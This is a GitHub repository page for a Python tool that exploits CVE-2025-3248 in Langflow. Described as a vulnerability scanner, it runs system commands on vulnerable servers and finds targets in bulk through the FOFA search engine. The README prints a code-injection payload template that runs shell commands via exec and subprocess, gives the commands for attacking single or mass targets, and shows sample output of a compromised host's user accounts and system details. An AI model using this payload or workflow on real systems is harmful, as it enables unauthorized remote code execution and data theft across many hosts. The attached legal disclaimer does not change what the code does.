Skip to content
/ CVE-2025-3248 Public

A vulnerability scanner for CVE-2025-3248 in Langflow applications. 用于扫描 Langflow 应用中 CVE-2025-3248 漏洞的工具。

www.ict.run

License

MIT license
7 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

xuemian168/CVE-2025-3248

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
src
src
 
 
.env.example
.env.example
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
README_CN.md
README_CN.md
 
 
main.py
main.py
 
 
passwd_payload.py
passwd_payload.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

中文 | English

Langflow Vulnerability Scanner

A vulnerability scanner for CVE-2025-3248 in Langflow applications.

Features

  • Scan single target or multiple targets using FOFA
  • Execute system commands on vulnerable targets
  • Retrieve system information
  • Custom payload support
  • Progress bar for FOFA scanning
  • Beautiful CLI interface

Installation

  1. Clone the repository:
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
  1. Install dependencies:
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
  1. Edit Environment File (optional)
# After you finish editing
mv .env.example .env

Usage

Single Target Scan

python main.py -t https://target.com

Using FOFA API

python main.py --fofa-email your@email.com --fofa-key your_api_key

Additional Options

  • -t, --target: Target URL to scan
  • --fofa-email: FOFA API Email
  • --fofa-key: FOFA API Key
  • --fofa-query: FOFA search query (default: 'app="LOGSPACE-LangFlow"')
  • --country: Filter results by country code (e.g., CN, US)
  • --max-pages: Maximum number of FOFA pages to retrieve (default: 5)
  • --page-size: Results per page (default: 100)
  • --timeout: Request timeout in seconds (default: 10)
  • --no-verify: Disable SSL verification
  • --threads: Number of threads for concurrent scanning (default: 5)
  • -f, --file: Custom Python file to use as payload

Custom Payloads

You can create custom payloads by creating a Python file:

def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass

Then use it with:

python main.py -t https://target.com -f your_payload.py

Output Example

    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux

Disclaimer

⚠️ Disclaimer This tool is for legal purposes only. It is designed for educational purposes, internal enterprise security testing, or use in authorized environments. It is strictly prohibited to use this tool on any unauthorized system, network, or device, otherwise it may violate relevant laws and regulations.

Users shall bear all legal responsibilities for their actions. The author and contributors are not responsible for any losses, data leakage or legal consequences caused by improper use of this tool.

⚠️ Do not use for illegal attacks. Do not attempt to deploy or run this tool on unauthorized systems.

References

License

MIT License

About

A vulnerability scanner for CVE-2025-3248 in Langflow applications. 用于扫描 Langflow 应用中 CVE-2025-3248 漏洞的工具。

www.ict.run

Topics

ai langflow

Resources

Readme

License

MIT license
Activity

Stars

7 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases 2

v1.2 Latest
Apr 10, 2025
+ 1 release

Packages

No packages published

Languages